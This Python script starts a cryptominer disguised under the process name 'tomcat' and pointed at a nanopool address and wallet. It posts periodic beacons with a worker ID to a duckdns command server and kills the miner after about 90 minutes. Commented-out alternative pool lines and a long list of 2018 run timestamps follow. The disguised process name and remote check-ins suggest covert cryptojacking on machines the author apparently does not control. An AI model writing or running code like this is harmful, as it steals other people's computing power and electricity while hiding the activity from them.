import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:49:01.688269
#2018-02-17 16:37:04.982899
#2018-02-17 18:25:01.476758
#2018-02-17 20:13:05.605997
#2018-02-17 22:01:06.948098
#2018-02-17 23:45:04.703263
#2018-02-18 01:36:01.616438
#2018-02-18 03:23:03.915051
#2018-02-18 05:10:08.196005
#2018-02-18 07:02:01.918864
#2018-02-18 08:49:07.004114
#2018-02-18 10:36:01.905860
#2018-02-18 12:21:04.622155
#2018-02-18 14:08:04.994460
#2018-02-18 15:58:05.966417
#2018-02-18 17:48:05.946892
#2018-02-18 19:36:05.845828
#2018-02-18 21:21:03.225433
#2018-02-18 23:09:06.851023
#2018-02-19 00:56:06.103594
#2018-02-19 02:42:07.903259
#2018-02-19 04:29:04.966614
#2018-02-19 06:14:04.058522
#2018-02-19 08:02:03.812238
#2018-02-19 09:52:04.206295
#2018-02-19 11:41:06.654358
#2018-02-19 13:27:06.634680
#2018-02-19 15:16:04.616025
#2018-02-19 17:04:08.134839
#2018-02-19 18:51:06.095296
#2018-02-19 20:40:07.597093
#2018-02-19 22:27:01.684201
#2018-02-20 00:12:07.240183
#2018-02-20 01:59:05.282581
#2018-02-20 03:49:07.140665
#2018-02-20 05:35:01.471236
#2018-02-20 07:19:06.215278
#2018-02-20 09:06:06.678204
#2018-02-20 10:49:05.826067
#2018-02-20 12:36:04.323935
#2018-02-20 14:21:04.815554
#2018-02-20 16:04:11.004634
#2018-02-20 17:51:01.508436
#2018-02-20 19:40:10.938090
#2018-02-20 21:26:06.333371
#2018-02-20 23:11:06.078531
#2018-02-21 00:57:07.725640
#2018-02-21 02:45:02.954426
#2018-02-21 04:33:01.823240
#2018-02-21 06:19:07.205575
#2018-02-21 08:57:06.733399
#2018-02-21 10:44:01.299672
#2018-02-21 12:32:07.032519
#2018-02-21 14:19:07.025288
#2018-02-21 16:06:08.703197
#2018-02-21 17:58:01.303765
#2018-02-21 19:43:06.133955
#2018-02-21 21:31:09.190746
#2018-02-21 23:18:01.895557
#2018-02-22 01:07:07.491389
#2018-02-22 02:53:06.643562
#2018-02-22 04:40:07.902204
#2018-02-22 06:24:01.484945
#2018-02-22 08:11:01.803240
#2018-02-22 09:58:04.816910
#2018-02-22 11:42:08.848499
#2018-02-22 13:28:07.295875
#2018-02-22 15:17:05.050799
#2018-02-22 17:02:06.452520
#2018-02-22 18:51:04.542272
#2018-02-22 20:44:06.856967
#2018-02-22 22:29:06.516863
#2018-02-23 00:16:06.213185
#2018-02-23 02:04:07.542651
#2018-02-23 03:52:04.778634
#2018-02-23 05:34:01.288547
#2018-02-23 07:19:01.910988
#2018-02-23 09:23:04.607434
#2018-02-23 11:30:05.225288
#2018-02-23 13:21:06.455611
#2018-02-23 15:08:06.153439
#2018-02-23 16:56:06.115391
#2018-02-23 18:33:07.853178
#2018-02-23 20:23:05.041260
#2018-02-23 22:09:07.659701
#2018-02-23 23:56:03.948729
#2018-02-24 01:46:05.318621
#2018-02-24 03:34:05.716053
#2018-02-24 05:19:01.803263
#2018-02-24 07:07:04.638973
#2018-02-24 08:54:05.468065
#2018-02-24 10:55:09.249769
#2018-02-24 12:43:04.855931
#2018-02-24 14:32:01.514047
#2018-02-24 16:19:06.198847
#2018-02-24 18:13:06.135168
#2018-02-24 19:59:01.811963
#2018-02-24 21:42:05.471673
#2018-02-25 00:36:07.215689
#2018-02-25 04:12:05.964970
#2018-02-25 07:43:01.773955